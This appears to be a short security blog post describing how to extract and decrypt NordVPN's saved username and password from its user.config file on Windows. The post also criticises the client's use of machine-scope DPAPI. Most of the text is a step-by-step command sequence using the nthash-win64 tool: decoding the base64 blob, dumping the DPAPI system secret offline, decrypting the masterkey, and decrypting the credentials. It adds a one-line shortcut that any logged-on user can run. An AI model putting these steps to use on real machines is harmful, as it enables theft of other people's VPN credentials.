We now know that dpapi secrets are everywhere stored in various ways.
Lets have a look at the popular vpn client : NordVPN.
NordVPN stores its secrets (username/password) on a config file (xml format) and is using a machine scope (not good if you ask me…).
Lets see how to decrypt it.
1-Retrieve nordvpn user.config in c:\users\username\appdata\local\nordvpn\nordvpn.exe_url_xxxx\
2-Retrieve the base64 values for username and password
example below of a base64 string
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALZTWkDFPOEa3VtEe+pBuUgQAAAACAAAAAAAQZgAAAAEAACAA
AABhL95rOFK1DD7EGJuziDclFhO1iTEpeB+zeqiKMjtH9AAAAAAOgAAAAAIAACAAAACpExW4x7XOO2zx
xi68pSpDiifZuCHq5fXrywC+9RWRmhAAAAAS4jvclZ2m/cTAaSjyW8iDQAAAAESj99ovArBss2PNqBm/
NTKsEVvnuOB+ZDqAQkD7GiwtOM4cy2rvQMnuioacujUkCf0coMPHT9wO+KP3MIHNLto=
3-Decode it to a hexa string
echo base64string| nthash-win64 /base64decodehexa
4-Save the hexa string to a file
echo hexastring| nthash-win64 /hexatofile
or … steps 2,3 and 4 can be done in one go (pipe in…pipe out…) like below
echo base64string| nthash-win64 /base64decodehexa | nthash-win64 /hexatofile
5-Retrieve the mk guid
nthash-win64 /decodeblob
6-Retrieve the dpapy system key
nthash-win64 /dumpsecret /input:dpapi_system /mode:machine /offline
(if machine key does not work, try user key)
7-Decrypt the (encrypted) masterkey
echo mydpapisyskey| nthash-win64 /decodemk /binary:c:\Windows\System32\Microsoft\ProtectS-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52
8-Finally, decrypt the dpapi blob
echo mymksha1key| nthash-win64 /decodeblob
or … steps 6,7 and 8 can be done in one go like below
NTHASH-win64.exe /dumpsecret /input:dpapi_system /mode:machine /offline | nthash-win64 /decodemk /binary:C:\Windows\System32\Microsoft\Protect\S-1-5-18\90d6942d-4f31-4638-b756-d11efa906e52 | nthash-win64 /decodeblob
Note that, online, any user logged on that machine, could simple do the below
echo base64string| nthash-win64 /base64decodehexa | NTHASH-win64 /cryptunprotectdata